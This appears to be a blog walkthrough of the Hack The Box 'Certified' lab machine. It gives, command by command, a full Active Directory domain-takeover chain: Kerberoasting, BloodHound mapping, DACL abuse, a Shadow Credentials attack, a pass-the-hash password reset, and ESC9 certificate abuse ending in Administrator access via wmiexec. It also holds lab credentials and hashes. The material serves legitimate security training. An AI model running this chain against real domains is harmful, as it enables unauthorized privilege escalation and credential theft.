Published on

HTB Certified Walkthrough

Authors
  • avatar
    Name
    Ankit
    Twitter

Overview

  • Initial Credentials: Used provided credentials (judith.mader:judith09) for enumeration.
  • SMB Enumeration: Identified accessible shares but found no useful data.
  • Kerberoasting: Extracted a service account hash but couldn't crack it.
  • BloodHound Analysis: Discovered privilege escalation paths using domain enumeration.
  • Privilege Escalation to management_svc:
    • Leveraged WriteOwner and GenericWrite rights on the Management group.
    • Performed a Shadow Credentials attack to gain access to management_svc.
  • Privilege Escalation to ca_operator:
    • Used the NTLM hash of management_svc to reset ca_operator’s password.
  • Privilege Escalation to Administrator:
    • Exploited an ESC9 vulnerability in the certificate template.
    • Requested and used a certificate to authenticate as Administrator.
  • Final Compromise: Obtained the NT hash for the Administrator account and achieved domain admin privileges.

The machine section showed us a hint to start.

Checking1

As is common in real-life Windows pentests, you start the Certified box with credentials for the following account:

judith.mader / judith09

Initial Enumeration

We begin with an Nmap scan to identify open ports and services:

nmap -p- -sC -sV 10.10.11.41

Checking1

This scan reveals that the target is likely an Active Directory domain controller. Based on the results, we add the following entries to our hosts file.

SMB Enumeration

Using the provided credentials, we enumerate SMB shares:

smbmap -H 10.10.11.41 -u judith.mader -p judith09

Checking1

The command lists available SMB shares. We find that SYSVOL and NETLOGON are accessible but don’t contain any immediately useful information.

Kerberoasting Attempt

We attempt a Kerberoasting attack using Impacket:

impacket-GetUserSPNs -dc-ip 10.10.11.41 -request certified.htb/judith.mader:judith09

This yields a hash for the management_svc account, but unfortunately, we are unable to crack it with hashcat.

BloodHound Analysis

We use BloodHound to map out the domain:

bloodhound-python -d certified.htb -u "judith.mader" -p "judith09" -dc dc01.certified.htb -ns 10.10.11.41 --zip -c All

After analyzing the results in BloodHound, we discover:

  • judith.mader has WriteOwner rights on the Management group.
  • The Management group has GenericWrite rights on management_svc.
  • The management_svc account has GenericAll rights on itself.

Privilege Escalation to management_svc

First, we give judith.mader ownership of the Management group:

impacket-owneredit -action write -new-owner "judith.mader" -target "Management" certified.htb/judith.mader:judith09

Next, we give judith.mader full control over the Management group:

impacket-dacledit -action "write" -rights "FullControl" -principal "judith.mader" -target "Management" certified.htb/judith.mader:judith09

Now we add judith.mader to the Management group:

net rpc group addmem "Management" "judith.mader" -U certified.htb/"judith.mader"%"judith09" -S 10.10.11.41

With these permissions, we perform a Shadow Credentials attack on management_svc:

pywhisker -d "certified.htb" -u "judith.mader" -p 'judith09' --target "management_svc" --action "add"

This generates a certificate file (e.g., lNR55Oli.pfx) and a password.

We then use this certificate to get a TGT for management_svc:

gettgtpkinit -cert-pfx lNR55Oli.pfx -pfx-pass N5bhtamnAnLKczV3nIsv certified.htb/management_svc management_svc.ccache

Finally, we extract the NTLM hash:

getnthash -key <AS-REP encryption key> certified.htb/management_svc

Privilege Escalation to ca_operator

With the NTLM hash for management_svc, we change ca_operator’s password:

pth-net rpc password "ca_operator" -U "certified.htb"/"management_svc"%"ffffffffffffffffffffffffffffffff":"<NTLM hash>" -S 10.10.11.41

When prompted, we set the new password to Password123.

Privilege Escalation to Administrator

Using ca_operator credentials, we enumerate vulnerable certificate templates:

certipy-ad find -dc-ip 10.10.11.41 -u ca_operator@certified.htb -p "Password123" -vulnerable -stdout

This reveals an ESC9 vulnerability in the CertifiedAuthentication template.

We exploit this vulnerability to request a certificate for the Administrator account:

certipy-ad req -u 'ca_operator@certified.htb' -p 'Password123'
-target dc01.certified.htb
-ca certified-DC01-CA
-template CertifiedAuthentication
-upn 'administrator@certified.htb'
-dc-ip 10.10.11.41

This generates a certificate file for the Administrator account.

Finally, we use this certificate to authenticate as Administrator:

certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.11.41

This gives us the NT hash for the Administrator account, which allows us to gain access:

impacket-wmiexec -hashes :0d5b49608bbce1751f708748f67e2d34 Administrator@10.10.11.41
Impacket v0.12.0
C:>whoami
certified\administrator
Checking1

And with that, we've successfully compromised the Certified machine and achieved domain admin privileges.

Clarification of the commands

Below is a breakdown of the key commands used in this walkthrough, along with their purpose:

  • nmap -p- -sC -sV 10.10.11.41: Scans all ports and performs service/version detection to identify open ports and services running on the target.
  • smbmap -H 10.10.11.41 -u judith.mader -p judith09: Enumerates SMB shares accessible with the provided credentials.
  • impacket-GetUserSPNs: Requests service tickets for accounts with SPNs, enabling Kerberoasting by retrieving encrypted hashes that can be cracked offline.
  • bloodhound-python: Collects data from Active Directory to map out privilege escalation paths using BloodHound.
  • impacket-owneredit: Modifies ownership of an AD object, allowing control over permissions for privilege escalation.
  • impacket-dacledit: Edits DACL (Discretionary Access Control List) permissions to grant specific rights (e.g., full control) over an object.
  • net rpc group addmem: Adds a user to a specified AD group via SMB, leveraging modified permissions.
  • pywhisker: Performs Shadow Credentials attacks by adding a certificate for a target account in AD, enabling authentication as that account.
  • gettgtpkinit: Retrieves a TGT (Ticket Granting Ticket) using a certificate, enabling further attacks or access to resources as the target user.
  • certipy-ad find: Enumerates vulnerable certificate templates in Active Directory for exploitation.
  • certipy-ad req: Exploits vulnerable certificate templates to request certificates for privileged accounts like Administrator.
  • certipy-ad auth: Authenticates to Active Directory using a certificate, bypassing traditional password-based authentication.
  • impacket-wmiexec: Executes commands on the target system via WMI (Windows Management Instrumentation), often used for post-exploitation.

Techniques Used

  1. Kerberoasting: A technique where service tickets are requested for accounts with SPNs. These tickets are encrypted with the service account's password hash, which can be cracked offline to retrieve credentials.

  2. BloodHound Analysis: BloodHound is used to analyze Active Directory environments and identify privilege escalation paths by mapping out relationships and permissions.

  3. Shadow Credentials Attack: Exploits misconfigurations in AD Certificate Services by adding unauthorized certificates for an account. These certificates can then be used to authenticate as that account.

  4. ESC9 Vulnerability Exploitation: Exploits weak configurations in AD Certificate Services where certificate templates allow low-privileged users to request certificates for privileged accounts.

  5. NTLM Hash Extraction and Pass-the-Hash (PTH): Extracts NTLM hashes from compromised accounts and reuses them for authentication without needing plaintext passwords.

  6. DACL Abuse (WriteOwner & GenericWrite): Leverages misconfigured permissions (e.g., WriteOwner, GenericWrite) on AD objects to escalate privileges by modifying ownership or access control lists.

  7. Certificate-Based Authentication: Uses certificates instead of passwords to authenticate as privileged accounts, bypassing traditional password-based protections.